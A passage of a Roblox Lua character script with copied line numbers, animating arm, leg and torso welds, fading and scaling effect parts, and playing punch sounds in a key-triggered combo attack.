				blast3.Size = Vector3.new(1, 1, 1)
11134
				blast3.TopSurface = "Smooth"
11135
				blast3.BottomSurface = "Smooth"
11136
				blast3.Transparency = 0
11137
				blast3.CFrame = HandCF
11138
				local bm3 = Instance.new("SpecialMesh", blast3)
11139
				bm3.Scale = Vector3.new(3,1,3)
11140
				bm3.MeshId = "rbxassetid://3270017"
11141
				for i = 1,120 do rs:wait()
11142
					X.Transparency = X.Transparency + (1/120)
11143
					part.Transparency = part.Transparency + (1/120)
11144
					part2.Transparency = part2.Transparency + (1/120)
11145
					part3.Transparency = part3.Transparency + (1/120)
11146
					part4.Transparency = part4.Transparency + (1/120)
11147
					part5.Transparency = part5.Transparency + (1/120)
11148
					part6.Transparency = part6.Transparency + (1/120)
11149
					part7.Transparency = part7.Transparency + (1/120)
11150
					blast.Transparency = blast.Transparency + (1/120)
11151
					blast2.Transparency = blast2.Transparency + (1/120)
11152
					blast3.Transparency = blast3.Transparency + (1/120)
11153
					X.Size = X.Size + Vector3.new(.8,.8,.8)
11154
					--part3.Size = part3.Size + Vector3.new(3,3,3)
11155
					mesh.Scale = mesh.Scale + Vector3.new(1,.2,1)
11156
					mesh2.Scale = mesh2.Scale + Vector3.new(1.1,.2,1.1)
11157
					mesh3.Scale = mesh3.Scale + Vector3.new(3,3,3)
11158
					mesh4.Scale = mesh4.Scale + Vector3.new(1.7,1.7,1.7)
11159
					mesh5.Scale = mesh5.Scale + Vector3.new(1.6,.2,1.6)
11160
					mesh6.Scale = mesh6.Scale + Vector3.new(2,.2,2)
11161
					mesh7.Scale = mesh7.Scale + Vector3.new(4,4,4)
11162
					bm.Scale = bm.Scale + Vector3.new(6,6,.2)
11163
					bm2.Scale = bm2.Scale + Vector3.new(4,4,.2)
11164
					bm3.Scale = bm3.Scale + Vector3.new(4,4,.2)
11165
					X.CFrame = cf
11166
					part.CFrame=X.CFrame * CFrame.Angles(0,math.rad(i*2),0)
11167
					part2.CFrame=X.CFrame * CFrame.Angles(0,math.rad(-i*2),0)
11168
					part3.CFrame=X.CFrame
11169
					part4.CFrame=X.CFrame
11170
					part7.CFrame=X.CFrame
11171
					part5.CFrame=X.CFrame * CFrame.Angles(0,math.rad(i*2.6),0)
11172
					part6.CFrame=X.CFrame * CFrame.Angles(0,math.rad(-i*2.4),0)
11173
					blast.CFrame=X.CFrame * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0))
11174
					blast2.CFrame=X.CFrame * CFrame.Angles(math.rad(-i*4), math.rad(i*4), math.rad(0))
11175
					blast3.CFrame=X.CFrame * CFrame.Angles(math.rad(180+i*4), math.rad(90-i*4), math.rad(0))
11176
					rs:wait()
11177
					end
11178
					X:Destroy()
11179
					part:Destroy()
11180
					part2:Destroy()
11181
					part3:Destroy()
11182
					part4:Destroy()
11183
					part5:Destroy()
11184
					part6:Destroy()
11185
					blast:Destroy()
11186
					blast2:Destroy()
11187
					blast3:Destroy()
11188
					z:Destroy()
11189
					z1:Destroy()
11190
					z2:Destroy()
11191
					z3:Destroy()
11192
					z4:Destroy()
11193
				end
11194
			end)
11195
			for i = 1, 20 do
11196
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.55,0)*CFrame.Angles(math.rad(70),math.rad(-6),math.rad(-20)), 0.2)
11197
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.55,0)*CFrame.Angles(math.rad(-6),math.rad(6),math.rad(-8)), 0.2)
11198
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.2)
11199
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(30), math.rad(0)), 0.4)
11200
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), 0, math.rad(-8)), 0.2)
11201
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-6), 0, math.rad(8)), 0.2)
11202
				if Debounces.on == false then break end
11203
				rs:wait()
11204
			end
11205
			if Debounces.CanAttack == false then
11206
				Debounces.CanAttack = true
11207
				Debounces.NoIdl = false
11208
				Debounces.on = false
11209
			end
11210
		end
11211
	end
11212
end)
11213
----------------------------------------------------
11214
mouse.KeyDown:connect(function(key)
11215
	if key == "e" then
11216
		if Debounces.CanAttack == true then
11217
		Debounces.CanAttack = false
11218
		Debounces.on = true
11219
		Debounces.NoIdl = true
11220
pt = {1, 1.1, 1.2, 1.3, 1.4, 1.5}
11221
z = Instance.new("Sound", rarm)
11222
z.SoundId = "http://www.roblox.com/asset/?id=206083107"--160867463, 161006212
11223
z.Volume = .6
11224
z.Pitch = pt[math.random(1,#pt)]
11225
z.Looped = false
11226
z:Play()
11227
Debounces.RPunch = true
11228
Debounces.LPunch = true
11229
Debounces.ks = true
11230
Debounces.ks2 = true
11231
for i = 1, 3 do
11232
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(20)), 0.92)
11233
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.92)
11234
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11235
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11236
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11237
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11238
if Debounces.on == false then break end
11239
wait()
11240
end
11241
z2 = Instance.new("Sound", larm)
11242
z2.SoundId = "http://www.roblox.com/asset/?id=206083107"
11243
z2.Volume = .6
11244
z2.Pitch = pt[math.random(1,#pt)]
11245
z2.Looped = false
11246
z2:Play()
11247
for i = 1, 3 do
11248
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11249
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(120),math.rad(20),math.rad(-20)), 0.92)
11250
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11251
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11252
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11253
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11254
if Debounces.on == false then break end
11255
wait()
11256
end
11257
z3 = Instance.new("Sound", rarm)
11258
z3.SoundId = "http://www.roblox.com/asset/?id=206083107"
11259
z3.Volume = 0.6
11260
z3.Pitch = pt[math.random(1,#pt)]
11261
z3.Looped = false
11262
z3:Play()
11263
for i = 1, 3 do
11264
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(-20),math.rad(20)), 0.92)
11265
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(0),math.rad(50)), 0.92)
11266
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11267
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11268
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11269
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11270
if Debounces.on == false then break end
11271
wait()
11272
end
11273
z4 = Instance.new("Sound", larm)
11274
z4.SoundId = "http://www.roblox.com/asset/?id=206083107"
11275
z4.Volume = .6
11276
z4.Pitch = pt[math.random(1,#pt)]
11277
z4.Looped = false
11278
z4:Play()
11279
for i = 1, 3 do
11280
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11281
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11282
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11283
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11284
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11285
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11286
if Debounces.on == false then break end
11287
wait()
11288
end
11289
z5 = Instance.new("Sound", rarm)
11290
z5.SoundId = "http://www.roblox.com/asset/?id=206083107"
11291
z5.Volume = .6
11292
z5.Pitch = pt[math.random(1,#pt)]
11293
z5.Looped = false
11294
z5:Play()
11295
for i = 1, 3 do
11296
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(110),math.rad(30),math.rad(20)), 0.9)
11297
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.9)
11298
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.9)
11299
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.9)
11300
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.9)
11301
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.9)
11302
if Debounces.on == false then break end
11303
wait()
11304
end
11305
z6 = Instance.new("Sound", larm)
11306
z6.SoundId = "http://www.roblox.com/asset/?id=206083107"
11307
z6.Volume = .6
11308
z6.Pitch = pt[math.random(1,#pt)]
11309
z6.Looped = false
11310
z6:Play()
11311
for i = 1, 3 do
11312
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11313
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11314
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11315
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11316
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11317
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11318
if Debounces.on == false then break end
11319
wait()
11320
end
11321
z7 = Instance.new("Sound", rarm)
11322
z7.SoundId = "http://www.roblox.com/asset/?id=206083107"--160867463, 161006212
11323
z7.Volume = .6
11324
z7.Pitch = pt[math.random(1,#pt)]
11325
z7.Looped = false
11326
z7:Play()
11327
for i = 1, 3 do
11328
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(20)), 0.92)
11329
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.92)
11330
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11331
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11332
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11333
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11334
if Debounces.on == false then break end
11335
wait()
11336
end
11337
z8 = Instance.new("Sound", larm)
11338
z8.SoundId = "http://www.roblox.com/asset/?id=206083107"
11339
z8.Volume = .6
11340
z8.Pitch = pt[math.random(1,#pt)]
11341
z8.Looped = false
11342
z8:Play()
11343
for i = 1, 3 do
11344
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11345
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(120),math.rad(20),math.rad(-20)), 0.92)
11346
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11347
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11348
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11349
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11350
if Debounces.on == false then break end
11351
wait()
11352
end
11353
z9 = Instance.new("Sound", rarm)
11354
z9.SoundId = "http://www.roblox.com/asset/?id=206083107"
11355
z9.Volume = 0.6
11356
z9.Pitch = pt[math.random(1,#pt)]
11357
z9.Looped = false
11358
z9:Play()
11359
for i = 1, 3 do
11360
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(-20),math.rad(20)), 0.92)
11361
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(0),math.rad(50)), 0.92)
11362
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11363
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11364
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11365
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11366
if Debounces.on == false then break end
11367
wait()
11368
end
11369
z10 = Instance.new("Sound", larm)
11370
z10.SoundId = "http://www.roblox.com/asset/?id=206083107"
11371
z10.Volume = .6
11372
z10.Pitch = pt[math.random(1,#pt)]
11373
z10.Looped = false
11374
z10:Play()
11375
for i = 1, 3 do
11376
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11377
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11378
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11379
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11380
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11381
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11382
if Debounces.on == false then break end
11383
wait()
11384
end
11385
z11 = Instance.new("Sound", rarm)
11386
z11.SoundId = "http://www.roblox.com/asset/?id=206083107"
11387
z11.Volume = .6
11388
z11.Pitch = pt[math.random(1,#pt)]
11389
z11.Looped = false
11390
z11:Play()
11391
for i = 1, 3 do
11392
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(110),math.rad(30),math.rad(20)), 0.9)
11393
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.9)
11394
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.9)
11395
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.9)
11396
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.9)
11397
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.9)
11398
if Debounces.on == false then break end
11399
wait()
11400
end
11401
z12 = Instance.new("Sound", larm)
11402
z12.SoundId = "http://www.roblox.com/asset/?id=206083107"
11403
z12.Volume = .6
11404
z12.Pitch = pt[math.random(1,#pt)]
11405
z12.Looped = false
11406
z12:Play()
11407
for i = 1, 3 do
11408
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11409
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(120),math.rad(20),math.rad(-20)), 0.92)
11410
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11411
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11412
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11413
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11414
if Debounces.on == false then break end
11415
wait()
11416
end
11417
z13 = Instance.new("Sound", rarm)
11418
z13.SoundId = "http://www.roblox.com/asset/?id=206083107"
11419
z13.Volume = 0.6
11420
z13.Pitch = pt[math.random(1,#pt)]
11421
z13.Looped = false
11422
z13:Play()
11423
for i = 1, 3 do
11424
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(-20),math.rad(20)), 0.92)
11425
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(0),math.rad(50)), 0.92)
11426
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11427
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11428
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11429
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11430
if Debounces.on == false then break end
11431
wait()
11432
end
11433
z14 = Instance.new("Sound", larm)
11434
z14.SoundId = "http://www.roblox.com/asset/?id=206083107"
11435
z14.Volume = .6
11436
z14.Pitch = pt[math.random(1,#pt)]
11437
z14.Looped = false
11438
z14:Play()
11439
for i = 1, 3 do
11440
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11441
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11442
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11443
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11444
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11445
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11446
if Debounces.on == false then break end
11447
wait()
11448
end
11449
z15 = Instance.new("Sound", rarm)
11450
z15.SoundId = "http://www.roblox.com/asset/?id=206083107"
11451
z15.Volume = .6
11452
z15.Pitch = pt[math.random(1,#pt)]
11453
z15.Looped = false
11454
z15:Play()
11455
for i = 1, 3 do
11456
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(110),math.rad(30),math.rad(20)), 0.9)
11457
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.9)
11458
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.9)
11459
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.9)
11460
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.9)
11461
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.9)
11462
if Debounces.on == false then break end
11463
wait()
11464
end
11465
z16 = Instance.new("Sound", larm)
11466
z16.SoundId = "http://www.roblox.com/asset/?id=206083107"
11467
z16.Volume = .6
11468
z16.Pitch = pt[math.random(1,#pt)]
11469
z16.Looped = false
11470
z16:Play()
11471
for i = 1, 3 do
11472
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11473
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11474
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11475
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11476
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11477
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11478
if Debounces.on == false then break end
11479
wait()
11480
end
11481
z17 = Instance.new("Sound", rarm)
11482
z17.SoundId = "http://www.roblox.com/asset/?id=206083107"--160867463, 161006212
11483
z17.Volume = .6
11484
z17.Pitch = pt[math.random(1,#pt)]
11485
z17.Looped = false
11486
z17:Play()
11487
for i = 1, 3 do
11488
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(20)), 0.92)
11489
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.92)
11490
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11491
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11492
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11493
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
11494
if Debounces.on == false then break end
11495
wait()
11496
end
11497
z18 = Instance.new("Sound", larm)
11498
z18.SoundId = "http://www.roblox.com/asset/?id=206083107"
11499
z18.Volume = .6
11500
z18.Pitch = pt[math.random(1,#pt)]
11501
z18.Looped = false
11502
z18:Play()
11503
for i = 1, 3 do
11504
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11505
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(120),math.rad(20),math.rad(-20)), 0.92)
11506
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11507
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11508
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11509
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11510
if Debounces.on == false then break end
11511
wait()
11512
end
11513
z19 = Instance.new("Sound", rarm)
11514
z19.SoundId = "http://www.roblox.com/asset/?id=206083107"
11515
z19.Volume = 0.6
11516
z19.Pitch = pt[math.random(1,#pt)]
11517
z19.Looped = false
11518
z19:Play()
11519
for i = 1, 3 do
11520
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(-20),math.rad(20)), 0.92)
11521
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(0),math.rad(50)), 0.92)
11522
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-50),0), 0.92)
11523
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(50), 0), 0.92)
11524
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-50), math.rad(-15)), 0.92)
11525
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-50), math.rad(15)), 0.92)
